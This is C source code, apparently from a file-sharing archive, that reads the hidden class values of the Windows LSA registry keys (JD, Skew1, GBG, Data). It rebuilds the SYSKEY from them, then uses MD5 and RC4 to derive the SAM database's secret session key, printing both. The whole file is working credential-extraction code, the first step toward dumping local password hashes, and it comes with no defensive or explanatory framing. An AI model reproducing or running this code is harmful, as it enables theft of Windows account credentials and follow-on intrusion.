SAM.rar_sam_sam session key_sam.sdf

#include "sessionkey.h" void getsyskey(unsigned char * syskey) { unsigned char keyselect[]={0x8,0xA,0x3,0x7,0x2,0x1,0x9,0xF, 0x0,0x5,0xd,0x4,0xb,0x6,0xc,0xe}; unsigned char syskey1[0x10]; HKEY hkResult; HKEY hkResult1; int i,j; long ss; unsigned char classinfo[0x10]; DWORD c1; ss=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Lsa",0,KEY_READ,&hkResult); if(ss!=ERROR_SUCCESS) return; ss=RegOpenKeyEx(hkResult,"JD",0,KEY_READ,&hkResult1); i=0; memset(syskey1,0,0x10); c1=0x10; if(ss==ERROR_SUCCESS) { ss=RegQueryInfoKey(hkResult1,(LPSTR) classinfo,&c1,0,0,0,0,0,0,0,0,0);// RegCloseKey(hkResult1); if(ss==ERROR_SUCCESS) { printf("JD:%s\n",classinfo); for(j=0;j<8;j++) { if(classinfo[j]>=0x30 && classinfo[j]<=0x39) classinfo[j]=classinfo[j]-0x30; else if(classinfo[j]>='a' && classinfo[j]<='f') classinfo[j]=classinfo[j]-'a'+0xa; else if(classinfo[j]>='A' && classinfo[j]<='F') classinfo[j]=classinfo[j]-'A'+0xa; else return; } syskey1[i+0]=16*classinfo[0]+classinfo[1]; syskey1[i+1]=16*classinfo[2]+classinfo[3]; syskey1[i+2]=16*classinfo[4]+classinfo[5]; syskey1[i+3]=16*classinfo[6]+classinfo[7]; i=i+4; } } c1=0x10; ss=RegOpenKeyEx(hkResult,"Skew1",0,KEY_READ,&hkResult1); if(ss==ERROR_SUCCESS) { ss=RegQueryInfoKey(hkResult1,(LPSTR) classinfo,&c1,0,0,0,0,0,0,0,0,0); RegCloseKey(hkResult1); if(ss==ERROR_SUCCESS) { printf("Skew1:%s\n",classinfo); for(j=0;j<8;j++) { if(classinfo[j]>=0x30 && classinfo[j]<=0x39) classinfo[j]=classinfo[j]-0x30; else if(classinfo[j]>='a' && classinfo[j]<='f') classinfo[j]=classinfo[j]-'a'+0xa; else if(classinfo[j]>='A' && classinfo[j]<='F') classinfo[j]=classinfo[j]-'A'+0xa; else return; } syskey1[i+0]=16*classinfo[0]+classinfo[1]; syskey1[i+1]=16*classinfo[2]+classinfo[3]; syskey1[i+2]=16*classinfo[4]+classinfo[5]; syskey1[i+3]=16*classinfo[6]+classinfo[7]; i=i+4; } } c1=0x10; ss=RegOpenKeyEx(hkResult,"GBG",0,KEY_READ,&hkResult1); if(ss==ERROR_SUCCESS) { ss=RegQueryInfoKey(hkResult1,(LPSTR) classinfo,&c1,0,0,0,0,0,0,0,0,0); RegCloseKey(hkResult1); if(ss==ERROR_SUCCESS) { printf("GBG:%s\n",classinfo); for(j=0;j<8;j++) { if(classinfo[j]>=0x30 && classinfo[j]<=0x39) classinfo[j]=classinfo[j]-0x30; else if(classinfo[j]>='a' && classinfo[j]<='f') classinfo[j]=classinfo[j]-'a'+0xa; else if(classinfo[j]>='A' && classinfo[j]<='F') classinfo[j]=classinfo[j]-'A'+0xa; else return; } syskey1[i+0]=16*classinfo[0]+classinfo[1]; syskey1[i+1]=16*classinfo[2]+classinfo[3]; syskey1[i+2]=16*classinfo[4]+classinfo[5]; syskey1[i+3]=16*classinfo[6]+classinfo[7]; i=i+4; } } c1=0x10; ss=RegOpenKeyEx(hkResult,"Data",0,KEY_READ,&hkResult1); if(ss==ERROR_SUCCESS) { ss=RegQueryInfoKey(hkResult1,(LPSTR) classinfo,&c1,0,0,0,0,0,0,0,0,0); RegCloseKey(hkResult1); if(ss==ERROR_SUCCESS) { printf("Data:%s\n",classinfo); for(j=0;j<8;j++) { if(classinfo[j]>=0x30 && classinfo[j]<=0x39) classinfo[j]=classinfo[j]-0x30; else if(classinfo[j]>='a' && classinfo[j]<='f') classinfo[j]=classinfo[j]-'a'+0xa; else if(classinfo[j]>='A' && classinfo[j]<='F') classinfo[j]=classinfo[j]-'A'+0xa; else return; } syskey1[i+0]=16*classinfo[0]+classinfo[1]; syskey1[i+1]=16*classinfo[2]+classinfo[3]; syskey1[i+2]=16*classinfo[4]+classinfo[5]; syskey1[i+3]=16*classinfo[6]+classinfo[7]; i=i+4; } } for(i=0;i<0x10;i++) { syskey[keyselect[i]]=syskey1[i]; } printf("SYSKEY: "); for(i=0;i<0x10;i++) printf("%02X ",syskey[i]); printf("\n"); } void getsampsecretsessionkey(unsigned char * syskey,unsigned char * fkey,unsigned char * secretkey) { char aqwerty[]="!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%"; char anum[]="0123456789012345678901234567890123456789"; MD5_CTX md5c; unsigned char md5hash[0x10]; RC4_KEY rc4k; MD5_Init( &md5c ); MD5_Update( &md5c, &fkey[0x70], 0x10 ); MD5_Update( &md5c, aqwerty, 0x2f ); MD5_Update( &md5c, syskey, 0x10 ); MD5_Update( &md5c, anum, 0x29 ); MD5_Final( md5hash, &md5c ); RC4_set_key( &rc4k, 0x10, md5hash ); RC4( &rc4k, 0x20, &fkey[0x80], secretkey ); printf("SecretSessionKey: "); for(int i=0;i<0x10;i++) printf("%02X ",secretkey[i]); printf("\n"); }